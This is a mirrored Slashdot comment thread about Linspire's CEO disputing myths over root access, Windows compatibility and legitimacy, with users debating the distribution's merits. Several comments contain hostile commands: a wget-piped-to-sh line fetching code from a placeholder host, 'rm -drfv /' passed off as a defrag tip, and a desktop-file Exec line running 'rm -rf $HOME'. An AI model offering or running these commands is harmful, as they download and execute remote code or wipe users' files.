Slashdot Mirror


Linspire CEO dispels Linspire Linux Myths

An anonymous reader writes "Chances are that you think Linspire lets you run Windows applications, that you have to run it as root, and that it's really not quite a proper Linux. Wrong, wrong, and wrong. At LinuxWorld in Boston this week, CEO Kevin Carmony explained what Linspire Linux is, and isn't all about. Carmony said that people are still getting these things wrong. Yes, in the beginning, Linspire had the goal of letting Linux users run Windows applications with WINE, but it dropped that theme years ago. As for requiring you to run as root, that was, Carmony said, only the case with an early alpha release that was never put in the public's hands. As for not being a real Linux, that's nonsense, too."

278 comments

  1. Linspire does actually run as root... by Gossi · · Score: 5, Informative

    ...By default. When you install Linspire, it sets you up as root by default. I know this because I supported it from Lindows 4 to Linspire Five-Oh. You have to go and manually add a user account, should you want one. That said, it is actually a lot more secure than people make out. There _is_ a lot of FUD about Linspire. For grannies and people who can't be bothered with technical things (including me, sometimes - I just want things that work) it's great.

    1. Re:Linspire does actually run as root... by MichaelSmith · · Score: 2, Interesting
      When you install Linspire, it sets you up as root by default.

      Looks like a good opportunity for an Ambidextrous Linux/Windows Virus

      But who ever installs Linspire? Doesn't it come installed from the shop?

    2. Re:Linspire does actually run as root... by Gossi · · Score: 4, Informative
      By install, I mean after installation, you're logged in as root by default. So the user has no idea they are root - they just are. (Although a box does appear the first time they switch on saying 'Make a user account').

      With regards to viruses, you'd have to drop to a terminal, chmod u+x a downloaded file, and ./run it. Does the average Linspire user know what that means? No.

    3. Re:Linspire does actually run as root... by /ASCII · · Score: 1

      I'll tell you who installs Linspire. ESR. Or at least he should.

      --
      Try out fish, the friendly interactive shell.
    4. Re:Linspire does actually run as root... by Breakfast+Pants · · Score: 1

      Even if it doesn't set you up as root is is of almost 0 consequence for a desktop machine made for someone buying the thing at walmart. If your account gets compromised, it is trivial to install a trojan which conviniently logs your keystrokes the next time you type in your root password to install widget 2.0.
       
      As far as the general case virus, as long as the thing destroys all the user's personal files, they aren't gonna care that the thing didn't get priviledged access to low level ports or that it couldn't spoof packets.

      --

      --

      WHO ATE MY BREAKFAST PANTS?
    5. Re:Linspire does actually run as root... by Cyno · · Score: 1

      To social engineer a Linspire user I would just ask them to copy and paste the following into their terminal:

      wget http://trojans.org/my/favorite/exploit | sh

      No chmod or download necessary.

      Its retardedly easy to hack systems where the user has root permissions. Even without root access this sort of attack could delete all their personal data.

    6. Re:Linspire does actually run as root... by cortana · · Score: 3, Informative
    7. Re:Linspire does actually run as root... by Arker · · Score: 1

      Exactly. And this is why their protestations, while technically true, aren't relevant. The users that *need* the protection of a user account the most, the ones they explicitly market to, are exactly the ones that aren't gonna have a freakin CLUE what 'create user account' means and will just hit cancel and go on their merry way.

      They really should work out a system like Apple is using, where the first user account is automatically in the wheel group and can sudo, but is otherwise a normal user account, with the root account disabled entirely. If it's friendly enough for Apple, it sure shouldn't be a problem for Linspire. Until they figure this out, I can't in good faith recommend Linspire to anyone.

      --
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Friends don't let friends enable ecmascript.
    8. Re:Linspire does actually run as root... by Mistshadow2k4 · · Score: 2, Informative

      "They really should work out a system like Apple is using, where the first user account is automatically in the wheel group and can sudo, but is otherwise a normal user account, with the root account disabled entirely."

      Several Linux distributions are set up that way, including Ubuntu and Mandriva (unless Mandriva has changed that in the last couple of years). But not Linspire, apparently. It would be a better idea for a distro that bases its marketing appeal on user-friendliness, wouldn't it?

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    9. Re:Linspire does actually run as root... by Arker · · Score: 1

      Interesting. I haven't used either of those (well, I used mandrake for awhile before the name change, but it didn't do that then.) But it sure works fine on my Apple, and I know I could set it up manually on Debian or Slackware without much trouble, so I don't see why they can't do it.

      I remember, way back when I was first trying Linux, I made the mistake of trying to 'startx' while logged in as root. It absolutely refused to run that way, forcing me to learn how to make a user account and run it properly. Seems to me more programs should do that, but I'm guessing the reverse is true these days.

      --
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Friends don't let friends enable ecmascript.
    10. Re:Linspire does actually run as root... by Elf_h34d3r · · Score: 1

      Y'know you can't rule out readme files...

    11. Re:Linspire does actually run as root... by Linegod · · Score: 1

      Mandriva was never like this.

      --
      -- I care not for your foolish signatures.
    12. Re:Linspire does actually run as root... by vwjeff · · Score: 1

      With regards to viruses, you'd have to drop to a terminal, chmod u+x a downloaded file, and ./run it. Does the average Linspire user know what that means? No. If they didn't before, they do now. Thanks for the information and helping to make Linux a secure computing environment. Next week's lesson: Delete your temp files and defrag your hard drive [root@linspire ~]$ rm -drfv / v added to give a visual display of the chaos unleashed on your system. Enjoy. Until next time, fsck you and finger Your Mama; whois a-hoe.net.

    13. Re:Linspire does actually run as root... by fbjon · · Score: 1
      That's damn smart actually. Refuse to run, printing a message that you should create an account, but of course allow to run if an obscure switch is given, like 'startx --ignore-root-despite-warning'. I can see those kinds of things being helpful on easy-to-use systems, though they're probably unnecessary in Slackware.

      On second thought, I cut my teeth on Slackware back in the day, maybe it would have done me good...

      --
      True confidence comes not from realising you are as good as your peers, but that your peers are as bad as you are.
    14. Re:Linspire does actually run as root... by labratuk · · Score: 1
      They really should work out a system like Apple is using, where the first user account is automatically in the wheel group and can sudo, but is otherwise a normal user account, with the root account disabled entirely.

      Root account disabled entirely??? It must be secure!

      Ever realised that it just means there's one fewer password to crack to get root access? And people are likely to use weaker passwords for just a 'user' account.

      "Hey! I need to use a webbrowser! How do I get into this machine?"

      "Oh, the password's ......"

      Bam. They've got full access.

      First thing I do on an ubuntu system is rip the sudo system out.
      --
      Malike Bamiyi wanted my assistance.
    15. Re:Linspire does actually run as root... by Cyno · · Score: 1

      Well, if they don't fix this it makes excellent fodder for my anti-freedesktop FUD machine. I like propoganda.

      Exec="rm -rf $HOME"

      Let's see how deep this rabbit hole goes..

    16. Re:Linspire does actually run as root... by cortana · · Score: 1

      As the string is just exec(2)'d directly I think it would need to be Exec=sh -c "rm -rf $HOME", but yes... nasty.

    17. Re:Linspire does actually run as root... by peteyp666 · · Score: 0

      Ever realize that it just means is there is one less known user ('root') and password to crack to get root access. And what makes you think that someone who uses a weak password for a 'user' account would have set up a strong password for there root account? You can also set up a non-sudoer account for guest use for a web browser.

  2. Linspire doesn't equal linux? by reklusband · · Score: 5, Insightful

    I don't think anybody ever thought it wasn't linux, just that it was a CRAPPY version of linux. I also don't think too many people thought about linspire in terms of OS, more in terms of questionable politics.

    1. Re:Linspire doesn't equal linux? by Illbay · · Score: 1
      questionable politics.

      OS-Nazi-speak for "trying to make a buck."

      --
      Any technology distinguishable from magic is insufficiently advanced.
    2. Re:Linspire doesn't equal linux? by westlake · · Score: 1
      questionable politics

      where questionable politics = retail-boxed and OEM Linux that can play media files without "stealing" a codec from Windows.

    3. Re:Linspire doesn't equal linux? by tonymus · · Score: 5, Insightful
      "I don't think anybody ever thought it wasn't linux, just that it was a CRAPPY version of linux."
      That's bullshit-ese for "they dare to charge for their product".

      I've been using Linspire for years; it's my third try at Linux (after Mandrake ver 7 and Lycoris Desktop L/X). It's stable, has lots of eye candy, runs KDE, and install and runs much Linux software with one click, thanks to Click 'N Run, the killer Linspire application. It supports many Internet file formats automatically, and lets me use my computer DVD player without becoming a pirate (per US laws).

      I understand the OS is a bit slow loading, and some OS'es may be a bit quicker in spots, but this doesn't bother me much at all. Linspire is MY choice for linux; YMMV.

      Really, these religous wars among distributions doesn't do Linux as a whole any good...

    4. Re:Linspire doesn't equal linux? by gui_tarzan2000 · · Score: 1
      I understand the OS is a bit slow loading, and some OS'es may be a bit quicker in spots, but this doesn't bother me much at all. Linspire is MY choice for linux; YMMV."

      I've been a Lin(spire)dows Insider since it came out in late 2001. I heard about it when it was just starting up and purchased my first version, .091 in Nov. '01. Shortly after they started offering the Lifetime membership we purchased that as well. I have been an on/off user for the last year or two because it doesn't handle built-in video memory on my laptops well at all. Or I should say Linux in general doesn't. Ubuntu is the only one that would load in 1024x768 but it didn't function correctly and Intel is no help when it comes to Linux video support.

      The latest version of the beta v5 loads extremely fast compared to older versions. It's comparable to XP on my new computers. Everything operates well except the support for some network cards is non-existent. I'm not geeky enough to spend a lot of time compiling, etc. so I live with it for now. It's still the best looking, easiest to use Linux system I've tried out of the dozen or so versions I've looked at over the last few years.

      Despite what some people say, they are within their rights to sell the features they do, but they also provide the source for the freely distributable portions like they're supposed to. And CNR works better than any other automated system for loading software. The target audience is spot-on, non-technical people who want a reliable and low cost system.

      --
      Have you hugged your penguin today?
    5. Re:Linspire doesn't equal linux? by ameoba · · Score: 1

      Despite what some people say, they are within their rights to sell the features they do

      Few will say they're overextending their rights. Many will say they're taking unfair advantage of clueless users.

      --
      my sig's at the bottom of the page.
    6. Re:Linspire doesn't equal linux? by Anonymous Coward · · Score: 0

      That's bullshit-ese for "they dare to charge for their product".

      The problem isn't that they charge for their product. The problem is that Linspire markets their product as a bait-and-switch scheme. You buy ubercheap PC, get it home, switch it on, and ...surprise... we'll give you some software as soon as you pay an extra $50.

      Any distro, pay or not, would be preferrable to Linspire. Linspire is a scam. For crying out loud....they try to sell a freakin virus scanner to their clueless users. They put the stupid thing right on the desktop panel to annoy them into paying up, to make them think it's the equivalent of NortonAV or Symantec. WTF is up with that!?!?!

      Don't take my word for it though. Download Linspire and take a look.

    7. Re:Linspire doesn't equal linux? by tonymus · · Score: 3, Informative
      "The problem isn't that they charge for their product. The problem is that Linspire markets their product as a bait-and-switch scheme. You buy ubercheap PC, get it home, switch it on, and ...surprise... we'll give you some software as soon as you pay an extra $50. Any distro, pay or not, would be preferrable to Linspire. Linspire is a scam. For crying out loud....they try to sell a freakin virus scanner to their clueless users. They put the stupid thing right on the desktop panel to annoy them into paying up, to make them think it's the equivalent of NortonAV or Symantec. WTF is up with that!?!?!"
      The only thing I agree with you on is WTF, as in WTF don't you understand?

      First off, that Linspire computer you bring home has a fully functioning version of Linux on it. Uncomment the sources file, and you can use apt-get.

      If you like Linspire and want to use Click-N-Run (and if you don't want to use it, you're probably better off with another distro), you have two options, one for $20 annually (unlimited use of C-N-R), and $50 (includes all OS updates and discounts on commercial linux software). They're not charging for free software; they're charging for the time involved in compiling and including the appropriate packages, so installing a program doesn't pooch your system. I consider that a fair deal.

      What is your problem with them offering AV software? You don't have to buy it and with one click of the mouse, you'll never see the system tray icon again. As explained by Kevin Carmony, they offer it because several important commercial clients requested it. And, thanks to the recent creation of a virus (concept only at this stage) that can attack both Windows and linux, maybe an AV program isn't so silly after all.

      I guess the biggest lie that got my back up was you calling their practices a scam and 'bait and switch'. That is simply unfair due to what I've explained above. You want 'bait and switch'? Buy a Compaq or Dell; you'll find out the AV software is only good for 90 days; to continue usually costs $30-$40 bucks.

      Okay, Linspire isn't for you; I can accept that. It wasn't designed for you. But, if you have any intelligence at all, you'd know not to go around spreading FUD. Linspire isn't your enemy; it's a commercial distribution that gives back to the OSS community. Deal with it.

    8. Re:Linspire doesn't equal linux? by Crazyscottie · · Score: 1

      Have you ever tried Xandros? IMHO, it's got all of those features, plus a free version is available. It's meant for Linux newbies, but powerful enough to hold its own in an expert's hands.

      --
      Just because it can't be explained doesn't mean it isn't true. Science fits into reality... not the other way around.
    9. Re:Linspire doesn't equal linux? by Knuckles · · Score: 1

      it's got all of those features

      Important difference: There is no US-legal solution for CSS'ed DVDs in Xandros

      --
      "When I first heard Daydream Nation it quite frankly scared the living shit out of me." -- Matthew Stearns
    10. Re:Linspire doesn't equal linux? by Anonymous Coward · · Score: 1, Insightful

      First off, that Linspire computer you bring home has a fully functioning version of Linux on it. Uncomment the sources file, and you can use apt-get.

      And you will break the OS this way. Unlike Ubuntu, Linspire doesn't maintain their own copy of Debian synced to Linspire. The sources.list is set to pull directly from Debian Unstable. If you start installing Debian packages you'll also pull in new libraries and end up with a thoroughly broken system.

      What is your problem with them offering AV software? You don't have to buy it and with one click of the mouse, you'll never see the system tray icon again. As explained by Kevin Carmony, they offer it because several important commercial clients requested it. And, thanks to the recent creation of a virus (concept only at this stage) that can attack both Windows and linux, maybe an AV program isn't so silly after all.

      By that leap of logic it would be reasonable to sell a Linux disk defragmenter. Sure, it doesn't actually do anything, but some clueless user may imagine they need it. Why point out defragmenting isn't necessary when you can make a quick buck of someone's stupidity.

    11. Re:Linspire doesn't equal linux? by just_another_sean · · Score: 1

      they try to sell a freakin virus scanner to their clueless users

      Well if the default behaviour is for the user to run as root then maybe they will need a virus scanner.

      --
      Creationist Textbook Stickers Declared Unconstitutional by CowboyNeal
    12. Re:Linspire doesn't equal linux? by CmdrPorno · · Score: 1

      It's not "a bit slow," it takes twice as long to boot as an installation of Windows XP with all the updates installed. I'm looking at a boot time of two minutes on a 2.4 GHZ machine with 512 MB of RAM. I removed Linspire from my computer (and my consideration) for this reason.

      --
      Sent from my iPhone
    13. Re:Linspire doesn't equal linux? by TheSystemHasFailed · · Score: 1
      Actually *Linspire* doesn't do Linux as a whole any good. Especially when you buy it pre-installed on low-end PCs that 'Joe Sixpack' buys and it actually makes them *wish* for Windows 98...

      At least that was the case when my mother-in-law bought a PC with it installed. I'm going to install SuSE 10 on it. Hopefully that'll be a better experience for her.

    14. Re:Linspire doesn't equal linux? by ElleyKitten · · Score: 1

      >>Few will say they're overextending their rights. Many will say they're taking unfair advantage of clueless users.

      Well, if they won't being taken advantage of by Linspire, then they'ld be taken advantage of by Microsoft for a lot more money.

      --
      "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
    15. Re:Linspire doesn't equal linux? by gui_tarzan2000 · · Score: 1
      "It's not "a bit slow," it takes twice as long to boot as an installation of Windows XP with all the updates installed."

      Maybe on your computer, but on a new Gateway E4600 with 512mb of ram that I have in my office, it takes roughly the same amount of time to load as it does XP. They both load fairly quickly and Linspire runs its programs just as fast as the MS programs in XP. Open Office takes a few seconds more to load, but is fine after that.

      --
      Have you hugged your penguin today?
    16. Re:Linspire doesn't equal linux? by DuckDodgers · · Score: 1

      Thanks for the information.

      I've got a 60-odd hour work week and two kids under age 3. I genuinely enjoy puzzling out whatever it is that isn't working in my latest Linux distribution, but I just don't have the time any more.

      Right now I'm having a reasonably easy time with Suse 10. If I run into too many snags, maybe my next attempt will be Linspire.

    17. Re:Linspire doesn't equal linux? by Wolfrider · · Score: 1

      > I have been an on/off user for the last year or two because it doesn't handle built-in video memory on my laptops well at all. Or I should say Linux in general doesn't. Ubuntu is the only one that would load in 1024x768 but it didn't function correctly and Intel is no help when it comes to Linux video support.

      --Have you tried passing a kernel parm at boot: like ' vga=791 ' for 1024x768 framebuffer mode?

      ===

      $ cat vgamodes-for-knoppix.txt
      Here is a vga= list:

      # VESA framebuffer console @ 1024x768x64k
      vga = 791

      # Normal VGA console
      # vga = normal

      # VESA framebuffer console @ 1024x768x64k
      # vga=791

      # VESA framebuffer console @ 1024x768x32k
      # vga=790

      # VESA framebuffer console @ 1024x768x256
      # vga=773

      # VESA framebuffer console @ 800x600x64k
      # vga=788

      # VESA framebuffer console @ 800x600x32k
      # vga=787

      # VESA framebuffer console @ 800x600x256
      # vga=771

      # VESA framebuffer console @ 640x480x64k
      # vga=785

      # VESA framebuffer console @ 640x480x32k
      # vga=784

      # VESA framebuffer console @ 640x480x256
      # vga=769

      --Courtesy of Monkeyman

      --
      .
      == WolfriderV6 == I'm willing to admit that *I just might* be wrong... Are you??
  3. Getting ahead of themselves? by Kijori · · Score: 5, Insightful

    Aren't they getting a bit ahead of themselves trying to dispel 'common myths' about Linspire when the vast majority of people have no idea what it is, let alone whether its main goal is to run Windows applications?

    1. Re:Getting ahead of themselves? by christian.einfeldt · · Score: 1

      Most people who have heard of Linspire are members of the Linux community already. Many of them are code wizards who have not tried Linspire recently, IMHO. I have enormous respect and gratitude for code wizards, because as a simple end user myself, I call upon code wizards all the time to help me with a CLI command here and there. So I most certainly am not knocking code wizards. But IMHO, code wizards can sometimes forget how hard it is for simple end users to do stuff with the CLI.

      So IMHO, yes there are myths about Linspire.

    2. Re:Getting ahead of themselves? by Elektroschock · · Score: 1

      They set the promise to support windows applications. Everybody was sceptical. And? What did they do to support Wine? Oh, they sponsored the wineConf, how nice.

      Linspire broke the promise. It is not impossible to make WINE more usable, in fact it is just a matter of money. They promised their customers to support Windows applications and then went away, they did not catch up with the expectations they raised.

      How can you trust a company that broke a promise of its core business model. A promise which can get fulfilled. Nobody requested Linspire to set the committment, they did it themselves.

      I don't understand why Linspire does not support - say DirectX or Comdlg - development of Wine. They promised it to us, they broke their promise. A simple matter of fact. Many distribution which never came up with such promises, supported Wine or shipped Crossover with their distribution.

      Enough. Now Linspire is just another debian distribution. Nice that they use KDE. But why Linspire when there are Kubuntu or OpenSuse? Why trust Linspire when there are more credible businesses. What could you expect from a company which broke its committments: Something like, 'we said we will support our distribution 2 years, but uhhmm that was our previous business model. We offer you an upgrade for 120$.' No thanks.

  4. Uh... okay by Anonymous Coward · · Score: 4, Insightful

    But here's the important thing. There's, like, ninety-six linux distributions. I already know that Ubuntu is friendly when you don't want to spend a lot of time configuring things, and Redhat is friendly to people in suits. But why the heck should I care about this one, Linspire? What, if anything, differentiates it from the other ninety-four linux distributions I don't personally have a use for at the present time? Because if there isn't a good answer to that question, it needs to go get back at the end of the line.

    1. Re:Uh... okay by x2A · · Score: 0

      "What, if anything, differentiates it from the other ninety-four linux distributions"

      They managed to REALLY piss Microsoft off with their original name :-p

      --
      The revolution will not be televised... but it will have a page on Wikipedia
    2. Re:Uh... okay by Daedalus-Ubergeek · · Score: 2, Interesting
      There's, like, ninety-six linux distributions.
      Actually, according to Wikipedia it's closer to 300. That doesn't include abandoned distributions or distributions being developed/used without the intent to publicly distribute (i.e. companies, military, the occasional linux user)
    3. Re:Uh... okay by emurphy42 · · Score: 1

      You probably don't have any reason to care about it. N00bs care about it because Linux installation procedures are sufficiently confusing to them that it's worth $20/year to them to avoid having to learn any of it.

    4. Re:Uh... okay by westlake · · Score: 1
      What, if anything, differentiates it from the other ninety-four linux distributions I don't personally have a use for at the present time?

      Because of the three remaining OEM Linux boxes sold out of Walmart.com, two run Linspire. The chain, it seems, has lost patience with Linux.

    5. Re:Uh... okay by martinultima · · Score: 1

      Confusing? Not necessarily. I've probably posted this a few times by now, but will post it again – it's a hell of a lot easier than you think. I happen to be a distro maintainer myself, and get a lot of e-mails from people who have tried my system, and either wanted to say how much they liked it, or else ask about some minor issue (usually after installation). We're talking first-time users here with no prior experience, most of them switching from Microsoft.

      So it must be the installer, right? Nope, not at all. My own distro is based more or less on Slackware, and the installer's been left entirely intact – which means that it's very flexible, but has a few rough edges, especially for first-time users. And yet they seem to have no problem at all with it. So I don't think it's really that.

      If you ask me, the trick is you have to be willing to learn. You don't start out an algebra class by punching stuff into a calculator; likewise, you shouldn't start with Linux by dumbing down the installation and configuration. It really isn't that hard at all – you just have to be willing to learn "the right way" of doing things, and don't be afraid to try things out. And if you don't like my idea of "the right way," so be it; the nice thing about Linux is that you have the freedom to choose which specific distro you like best.

      By the way, if anyone is interested – I've right now got everyone in my family hooked on Linux now. And despite what you may think, it wasn't easy to convert them – I had enough of a time just convincing them to quit using Internet Explorer a couple years ago, and it took a while to show them just how much better the Way of the Penguin truly is... but once they saw it, they were immediately addicted.

      And to think that only a couple years ago, I was just starting with a copy of Red Hat 8.0 that came with a copy of Linux for Dummies... and that the whole reason I switched to Linux was because it looked prettier than Windows. Time sure does fly...

      --
      Creative misinterpretation is your friend.
    6. Re:Uh... okay by slavemowgli · · Score: 1

      Actually, according to LWN.net's distribution list (just updated a few days ago), it's about 500. And if you leave out the inactive ones, it's still more than 450.

      --
      quidquid latine dictum sit altum videtur.
    7. Re:Uh... okay by whatteaux · · Score: 1

      "There's, like, ninety-six linux distributions."

      According to DistroWatch, there's 497. But who's counting, right?

      http://distrowatch.com/search.php?status=All

    8. Re:Uh... okay by emurphy42 · · Score: 1
      you have to be willing to learn
      I would consider this as grounds for removing the "n00b" label, hence I stand by my previous statement. Or, put another away, n00bs think it's confusing enough that they'd rather pay $20/year than even try to figure it out.
  5. Intersting statement from TFA by TubeSteak · · Score: 3, Interesting
    Linspire also doesn't rely on downloads, subscriptions, or box sales for its revenue. Instead, Linspire's bottom line relies upon two things. The first is sales of Linspire-equipped PCs.

    "I don't care about how many people download Linspire or buy our boxes in the stores. What I care about is how many people bought a computer with Linspire on it," [Linspire CEO] Carmony said.
    I'm not really sure what to make of this statement.

    It strikes me as somewhat... odd. Especially coming from a CEO.
    Maybe someone can put my vague feeling into words.
    --
    [Fuck Beta]
    o0t!
    1. Re:Intersting statement from TFA by TheRealMindChild · · Score: 3, Informative

      The reason BeOS failed (so they calim) was that microsoft strongarmed vendors to not sell machines with BeOS preinstalled (MS: If you sell machines with BeOS, you can't sell Windows machines anymore). Retail sales of an operating system of todays magnitude doesn't pay the bills. Not even close.

      --

      "When life gives you lemons, don't make lemonade. Make life take the lemons back!" -- Cave Johnson
    2. Re:Intersting statement from TFA by Gossi · · Score: 1

      He was channeling Bill Gates.

    3. Re:Intersting statement from TFA by caluml · · Score: 0, Troll
      Maybe someone can put my vague feeling into words.

      Perhaps you're trying to come out of the closet?

    4. Re:Intersting statement from TFA by Anonymous Coward · · Score: 2, Insightful

      I think what he's getting at is that most of the big money in OS sales comes from OEM deals rather than sales direct to customers. Microsoft make most of their sales via OEMs so why shouldn't Linspire try and do the same? Sounds like a winning formula to me.

    5. Re:Intersting statement from TFA by sp0rk173 · · Score: 2, Insightful

      Boxes as in boxed OS product, not box as in computer.

    6. Re:Intersting statement from TFA by Chysn · · Score: 0

      > I'm not really sure what to make of this statement.

      I read it like this: "If OEM PC manufacturers are going to consider helping us propagate our OS, they have to know that PCs with Linspire are sellable." If Linspire is installed aftermarket, it's just another Linux distro.

      --
      --I'm so big, my sig has its own sig.
      -- See?
    7. Re:Intersting statement from TFA by x2A · · Score: 4, Informative

      "(MS: If you sell machines with BeOS, you can't sell Windows machines anymore)"

      Well I think it was more like "If you only sell machines with Windows preinstalled, we'll give you a discount on the purchase price" ... so anyone trying to move away from selling all their machines with windows (either selling blank machines, or selling machines with another OS installed) was instantly less competative on their windows machines, locking them in :-/

      So yes in a way I guess it was like saying "you can't sell windows machines anymore", but more "we're gonna make it difficult to".

      --
      The revolution will not be televised... but it will have a page on Wikipedia
    8. Re:Intersting statement from TFA by evil+agent · · Score: 4, Insightful
      Translation:

      Many people download Linspire
      Implies: geeks are using Linspire
      Conclusion: who cares, nothing new

      Many people buy computers with Linspire on them
      Implies: regular, 'non-geek' people are using Linspire
      Conclusion: increase in Linux adoption

      --
      End transmission.
    9. Re:Intersting statement from TFA by TheRealMindChild · · Score: 5, Informative

      http://en.wikipedia.org/wiki/Be_Incorporated

      "Ultimately the assets of the corporation were bought by Palm, Inc. for US$11 million in 2001, at which point the company entered dissolution. The company then initiated litigation against Microsoft for anti-competitive business practices, specifically the prohibition of OEM's to allow dual-boot systems containing both Microsoft and non-Microsoft operating systems. The suit was settled in September 2003 with a US$23.25 million payout to Be, Inc."

      --

      "When life gives you lemons, don't make lemonade. Make life take the lemons back!" -- Cave Johnson
    10. Re:Intersting statement from TFA by Anonymous Coward · · Score: 0

      So yes in a way I guess it was like saying "you can't sell windows machines anymore", but more "we're gonna make it difficult to".


      The business of consumer Windows PC, which has been a commodity for a while now, has a razor thin margin. Small increase in cost due to Windows license pricing can wipe out any profit the operation generated. So, yeah. Difficult. More likely impossible.
    11. Re:Intersting statement from TFA by bxbaser · · Score: 1

      Sounds like he doesnt care if people WANT linspire just that they get STUCK with it.

    12. Re:Intersting statement from TFA by AKAImBatman · · Score: 2, Insightful

      I'm not really sure what to make of this statement.

      Allow me to explain: Michael Roberts does business by drawing attention to himself. He makes various outlandish statements that he simply can't backup. (Remember when Lindows was going to run 90% of the Windows programs?) If you want to make something of his statements, interpret them as nothing more than pandering to the audience.

    13. Re:Intersting statement from TFA by westlake · · Score: 1
      I'm not really sure what to make of this statement.

      The PC has been sold as a plug and play office machine and home appliance for over twenty-five years. The OEM system install is the norm.

      System builders may disagree, but the numbers say that the DIY market is as dead as Heathkit.

    14. Re:Intersting statement from TFA by nolife · · Score: 1

      Off topic but I bought a PC with Lycoris and one with Linspire (Lindows at the time). They were the $199 cheapies that Walmart.com had a few years ago from Microtel. I put in 512 more ram in each used them for a month or so and they were alright but I ended up putting Mandrake on them. No specific reasons other then at the time, I liked Mandrake better. As they sit now a few years later, one still has Mandrake, the other Xandros.

      I doubt either Linspire or Lycoris got any money from me as I did not subscribe to thier service offerings.

      --
      Bad boys rape our young girls but Violet gives willingly.
    15. Re:Intersting statement from TFA by SirSlud · · Score: 1

      Thats not informative, thats flat out wrong.

      --
      "Old man yells at systemd"
    16. Re:Intersting statement from TFA by JumperCable · · Score: 1

      I bought a cheep system with Linspire on it. I thought it would have better odds of having hardware supported by other Linux distributions. I wiped Linspire & installed Centos.

      Seriously, who has the time to look up every piece of hardware on a Hardware Compatability list.

    17. Re:Intersting statement from TFA by Anonymous Coward · · Score: 0

      That's the SECOND reason why BeOS failed. The first reason is that Gassee overestimated Apple's need for his product. He asked for more money than Apple was willing to pay and they bought NeXT instead. With the return of Jobs, Apple stopped sharing engineering data on their machines with Be and Be was forced to develop for the commodity PC hardware that they could get the data on.

      You can pick it up from there.

    18. Re:Intersting statement from TFA by Cryptnotic · · Score: 1

      Fine for anti-competitive business practices: $23.25 million.
      Almost total domination of the PC operating system business: priceless.

      --
      My other first post is car post.
  6. Re-tree by x2A · · Score: 5, Insightful

    Many complaints I hear about moving over to unix like systems is the filesystem hierarchy. I think for a really easy-for-noobs and for grabbing windows users, I'd like to see a patched distro where /dev, /proc, /sys etc are moved to (for example) /system. Put them all together and move them where the users knows they're not gonna need to go into.

    Could even have a chrooted dir with mount --binds to make a seperate namespace for unpatched/closed source apps.

    We really could do with tidying the root. Yes it breaks compatibility with unpatched software, but as it is breaks compatibility with users.

    (let the flaming commense)

    --
    The revolution will not be televised... but it will have a page on Wikipedia
    1. Re:Re-tree by helmespc · · Score: 2, Interesting

      I actually agree... the Linux/Unix file tree is confusing and gives the impression of being unorganized. I find it difficult to determine where things exist on my Linux machine as an advanced user, I can only imagine how it looks to a novice. A lot can be done to Linux to add usability for less advances users while keeping the options open for experts... I'd like to see even more strides made toward usability in future releases.

    2. Re:Re-tree by sp0rk173 · · Score: 1

      (let the flaming commense)

      You overestimate how controversial your statement is (or, really, isn't). Many people have said the same thing. You offer nothing original to this discussion.

    3. Re:Re-tree by maxx_730 · · Score: 5, Informative

      Already exists :D

      Check www.gobolinux.org

    4. Re:Re-tree by x2A · · Score: 1

      "You offer nothing original to this discussion"

      I didn't say what the commensing flaming would be about, whether it's controversialness or it's unoriginality, but you still stepped up :-p

      --
      The revolution will not be televised... but it will have a page on Wikipedia
    5. Re:Re-tree by Eideewt · · Score: 3, Insightful

      I would say that root is a place that users never need to go into. A user's home directory is the only part of the computer they ought to mess with. Ideally, a noob will never know about the directories above /home/yournamehere unless they decide they want to learn some stuff and muck around with the guts of their system. The current way puts the user's zone in its own litte branch of the file system, which is pretty much the same as hiding the rest of the system in a subdirectory, except instead of knowing not to enter the dreaded system folder, users don't even have to be aware of it (and they can't rm -rf * it). A user should never ever be messing around in root. That's why a normally configured system doesn't even let them do more that look at it. It's true that most home users will at some point need to be their own admin as well, but in that case, it doesn't much matter that the system files are right there, since the admin is working with them anyway.

    6. Re:Re-tree by x2A · · Score: 1

      oo, thank's very much, I shall go check it out :-)

      --
      The revolution will not be televised... but it will have a page on Wikipedia
    7. Re:Re-tree by GlassHeart · · Score: 4, Informative
      Many complaints I hear about moving over to unix like systems is the filesystem hierarchy. I think for a really easy-for-noobs and for grabbing windows users, I'd like to see a patched distro where /dev, /proc, /sys etc are moved to (for example) /system.

      Check out MacOS X sometime. If you use the Finder (the GUI), you see your drives (technically, a partition on a drive, but they are displayed with a drive icon). Clicking on the main one shows you four directories: Applications, Library, System, and Users. However, if you bring up the terminal and cd to the root directory, you see all the other Unixy directories, along with the four named above.

      Thus, newbies who don't bring up the terminal never see the Unix directories, people who want to can still do it, and software don't have to be patched.

    8. Re:Re-tree by Anonymous Coward · · Score: 0

      one could easily do the LAME BRAIN tatic of the Mac OS X (non)finder - simply keep a list of directory paths and not show them to the user.

      I still use locate on my mac and the terminal because the finder is so lame.

    9. Re:Re-tree by vadim_t · · Score: 1
      There will be several effects, IMO:
      • A very few people will go "Yay! It doesn't look so confusing now. I'll just ignore /system. For those few, it'll be good
      • Other people will initially be like above, but will then go on to download something like the Linux version of Neverwinter Nights, and be really puzzled that it doesn't work. Then they'll go scream at Bioware, and complain that Linux is crap and why can't just it be like Windows where you click on setup.exe.
      • Application developers everywhere will be annoyed that now they have to take into account things like that scripts beginning with #!/bin/bash will now fail, and that commonly used tools are suddenly entirely somewhere else. Clever scripts that search common paths for stuff will fail miserably.
      • Some admins will really hate having them on the network, as the Linux FS layout is well thought for partitioning and NFS.
      • It'll be a nightmare for IRC channels, now they have to consider that telling people to boot with init=/bin/bash may not work, and some will need to figure out where everything is on this particular distribution. Not only annoying, it looks bad when a supposedly expert user can't figure it out.
      • People with experience will probably ignore the distribution, why use something made in a way that's incompatible with almost everything else?
      • As a result of the above, help in IRC and similar will be hard to get

      Resuming, IMHO, this means a precious few happy people, a lot of annoyance for many others, and a lot of time spent on development and patching that could be spent a lot better on something more important.

    10. Re:Re-tree by Anonymous Coward · · Score: 0

      This just shows how "stuck in the seventies" linux and unix in general is.

      The entire OS should reside within one _logical volume_!

      All OS-programs should regard this logical volume as "/" and scripts etc would work as normal.
      It should be easy to assign multiple directories, local and remote, to one logical directory (think unionfs, but implemented cleanly in the kernel, not as yet another hacked filesystem based on nfs)

      A user that logs in sees several volumes in his shell/requesters,
      for example..

      Homedir of John [HOME:]
      Fedore Core 9 [OPSYS:]
      Programs [PROGS:]
      Other users [HOMES:]
